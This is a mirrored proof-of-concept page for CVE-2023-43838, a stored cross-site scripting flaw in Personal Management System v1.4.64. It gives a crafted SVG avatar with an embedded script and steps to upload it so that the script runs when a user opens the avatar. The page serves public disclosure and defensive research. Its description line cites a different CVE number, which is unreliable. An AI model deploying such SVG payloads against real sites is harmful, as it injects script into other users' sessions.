CVE-2023-43838 PoC — Personal Management System 代码问题漏洞

Source

https://github.com/rootd4ddy/CVE-2023-43838

Associated Vulnerability

Title:Personal Management System 代码问题漏洞 (CVE-2023-43838)
Description:Personal Management System是Dariusz个人开发者的一个用于管理个人数据的 Web 应用程序。 Personal Management System v1.4.64版本存在代码问题漏洞，该漏洞源于存在任意文件上传漏洞。攻击者可利用该漏洞通过将SVG文件上传到用户配置文件中来执行任意代码。

Description

Public disclosure for CVE-2023-31584.

Readme

# CVE-2023-43838

An arbitrary file upload vulnerability in Personal Management System
 v1.4.64 allows attackers to execute arbitrary code via uploading a
 crafted SVG file into a user profile's avatar.

 ------------------------------------------

 [Additional Information]
 1.) Create alert.svg with the following content:

```
 <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
    <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
    <script type="text/javascript">
       alert("huntr.dev");
    </script>
 </svg>
```


2.) Host .SVG on webserver.

3.) Upload .SVG as avatar image.
4.) When a user opens the avatar in a seperate tab, javascript stored in the .SVG file is executed.


References:
https://github.com/Volmarg/personal-management-system

File Snapshot


 [4.0K]  /data/pocs/a43509edb2d8488655f272e868606300d80e300a
└── [ 824]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!